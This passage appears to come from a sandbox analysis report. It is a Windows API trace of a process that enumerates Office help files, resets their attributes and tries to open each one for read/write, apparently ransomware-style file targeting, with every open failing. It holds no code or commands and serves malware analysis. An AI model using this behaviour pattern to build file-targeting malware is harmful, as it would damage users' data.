(lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.213] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.213] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.213] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.213] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.213] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.213] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.213] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.214] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.214] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.214] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.214] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.216] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.216] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.217] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.217] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.217] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.217] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.217] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.217] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.220] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.220] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS", dwFileAttributes=0x80) returned 0 [0136.220] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.221] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.221] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.221] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.221] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.221] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.221] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.221] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.222] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.222] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.222] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.222] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.222] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.222] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.222] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.222] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.223] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.223] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.223] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.223] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.223] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.223] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.223] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.224] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.224] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.224] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.HXS", dwFileAttributes=0x80) returned 0 [0136.224] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.224] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.224] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.224] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.224] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.225] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG", dwFileAttributes=0x80) returned 0 [0136.225] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.OPG" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.opg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.226] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.226] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.226] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.226] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.226] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.226] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.226] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.227] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.227] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.227] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.227] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.227] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.227] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.227] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.227] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.228] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.228] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.228] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.228] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.228] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.228] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.228] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.228] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.228] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.228] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSQRY32.CHM", dwFileAttributes=0x80) returned 0 [0136.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSQRY32.CHM" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msqry32.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.229] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.229] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.229] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.229] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.229] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.229] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS", dwFileAttributes=0x80) returned 0 [0136.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.229] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.229] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.229] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.229] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.230] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.230] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.230] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.230] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.230] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.230] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.230] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.230] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.230] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.230] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.231] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.231] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.231] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.231] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.231] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.231] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.231] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.232] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.232] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.232] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.232] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK.CSS", dwFileAttributes=0x80) returned 0 [0136.232] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.233] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.233] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.233] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.233] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.233] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD", dwFileAttributes=0x80) returned 0 [0136.234] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK1.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network1.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.234] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.234] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.234] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.234] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.234] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD", dwFileAttributes=0x80) returned 0 [0136.234] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network2.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.234] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.234] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.235] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.235] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.235] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD", dwFileAttributes=0x80) returned 0 [0136.235] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network3.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.235] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.235] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.235] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.235] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.235] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OCCMPVRD.XML", dwFileAttributes=0x80) returned 0 [0136.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OCCMPVRD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\occmpvrd.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.236] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.236] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.236] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.236] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.236] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OCMODVRD.XML", dwFileAttributes=0x80) returned 0 [0136.237] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OCMODVRD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ocmodvrd.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.237] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.237] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.237] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.237] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.237] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.237] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS", dwFileAttributes=0x80) returned 0 [0136.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.238] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.238] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.238] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.238] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.238] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.238] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.238] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.238] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.239] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.239] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.239] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.239] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.239] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.239] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: 